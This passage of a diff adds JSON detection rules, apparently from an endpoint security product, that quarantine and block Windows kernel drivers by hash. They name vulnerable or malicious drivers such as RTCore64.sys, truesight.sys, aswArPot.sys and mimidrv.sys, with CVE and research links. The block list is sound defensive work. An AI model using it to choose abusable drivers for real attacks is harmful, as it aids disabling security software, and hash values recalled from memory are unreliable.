+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b041cd6-35ba-5989-a51a-e4d82ad9bd37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144688Z",
+ "creation_date": "2026-03-23T11:45:32.144690Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144696Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8248306bcc5fae20fd4f3d5c44f962c85cddbe020b34a1799350ce2034154b7d",
+ "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b07790c-7e11-59dd-a07c-17410bd4f478",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460794Z",
+ "creation_date": "2026-03-23T11:45:30.460798Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460806Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7a61c671eab1dfaa62fe1088a85f6d52fb11f2f32a53822a49521ca2c16585e",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b0cb0a5-44ea-5019-a4bb-6575ec428c0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479475Z",
+ "creation_date": "2026-03-23T11:45:30.479477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee8ee16198dd8eec8d5fbb7f98f64bb849b2dfcf652cc102f4cdc63a4551549f",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b180cca-d32d-5a97-8a19-39ef0930801e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453842Z",
+ "creation_date": "2026-03-23T11:45:30.453845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453855Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11dcfa779763dd6e26344b32dd779bb49be470a7b9b43b5f03738c17fed06aa8",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b1f520f-251e-5247-a7d0-d3cdf941edc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968458Z",
+ "creation_date": "2026-03-23T11:45:29.968460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "033a14d3863dcb5b990788697a1096fd1f03586694b7872bb47826953f69c9f0",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b20b6cd-95f1-5be4-8e81-17f616783845",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820373Z",
+ "creation_date": "2026-03-23T11:45:30.820375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f806a9de79ac2886613c20758546f7e9597db5a20744f7dd82d310b7d6457d0",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b3c2c9a-acc6-5b21-9a5c-5b834cc9d31f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826332Z",
+ "creation_date": "2026-03-23T11:45:31.826335Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "689d7260ad115a4d5d45cbd44769208925a1441fe5b0d1ba15f9b14371f936e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b40c88f-711a-58ee-a80f-01194192dacb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470961Z",
+ "creation_date": "2026-03-23T11:45:30.470964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470973Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01096e6d09cad1af557561f678e70434355a4d07a94ba97774957c16e87bab6a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b4b6ecc-05b1-584e-8db0-0e152ef00ec1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471469Z",
+ "creation_date": "2026-03-23T11:45:30.471472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471482Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db73b0fa032be22405fa0b52fbfe3b30e56ac4787e620e4854c32668ae43bc33",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b4cb740-90d3-54ec-be83-ca9474f0faf7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457041Z",
+ "creation_date": "2026-03-23T11:45:30.457044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1fe70267698ba60012ca4c2c0f21325236bafc7b42fa977a09afa6a0c5ed3784",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b72ffda-4f5b-5add-8e10-10fe0ee2f202",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823446Z",
+ "creation_date": "2026-03-23T11:45:31.823449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ed8bb1bd3663e2c641a46fd5c35c0275c5f89436abf8a83b3fbdb8eb1a534c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b7c83d3-8d9d-52ad-9715-7f3075819438",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620388Z",
+ "creation_date": "2026-03-23T11:45:29.620390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620395Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b8ab76f-337a-58e7-9b46-41b701737176",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155206Z",
+ "creation_date": "2026-03-23T11:45:31.155208Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d20aa6ed460e6727acaa1a81f3305c5c32626f5f973d6839461c6d7292fb185b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5b96dc37-1f27-5374-9b68-b9c6e3ab7dff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817865Z",
+ "creation_date": "2026-03-23T11:45:30.817868Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "419b5bca6d43650893d5e044e785c0ad87cbe1185de0d3feaa9f681c6e7f50b4",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ba26841-1043-567b-ac27-96295134e597",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144409Z",
+ "creation_date": "2026-03-23T11:45:32.144412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144417Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d40f6a680914df8c6cf8dda62332ad829a91815ad94439b920af986f93939a7d",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ba68e64-64c4-5208-9efe-347c3d239566",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462849Z",
+ "creation_date": "2026-03-23T11:45:30.462852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60ee78a2b070c830fabb54c6bde0d095dff8fad7f72aa719758b3c41c72c2aa9",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ba6b281-326b-5f0a-b14f-b3c7ed603d33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826981Z",
+ "creation_date": "2026-03-23T11:45:30.826983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826988Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "544be349a5bd52275bd943bfd7d0c1f486d526c27528cb3020e23da4a905afab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5bb34de9-c08c-5a99-bdfa-d2af69539ef9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149789Z",
+ "creation_date": "2026-03-23T11:45:31.149791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49de16e30da6d3639cb06b2cee03ce75677caf95ba9e9ca5b89e3b8cdeca5fdb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5bec0360-9605-589e-9e9b-0f957d18edab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821799Z",
+ "creation_date": "2026-03-23T11:45:31.821802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46cfe42abb9263471121ecdf6f0af023b2e9dd2ab6733b2138fd0657a5fee997",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c0201d7-1a57-56d2-bb66-1b112f5842b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155119Z",
+ "creation_date": "2026-03-23T11:45:31.155121Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3bfc1fc0f8b5516d82ea982269ee6075c2d28a429c3be7f3f3249c5adb96b74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c061ae9-6588-5736-9f23-e1fb6e1a5642",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619717Z",
+ "creation_date": "2026-03-23T11:45:29.619718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6f8aa3de5b4aea58eddd45807d722c864d4bc4a38ad573174af864e21f0d526",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c063c73-64f8-52d4-ba75-d79251201ec2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971615Z",
+ "creation_date": "2026-03-23T11:45:29.971617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a59ad5be59f73f2a138c70d8aa634bf5f3364a67e072b64ff2a6d4627514a9ad",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c14b3aa-739c-5021-b29d-964808ca84fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
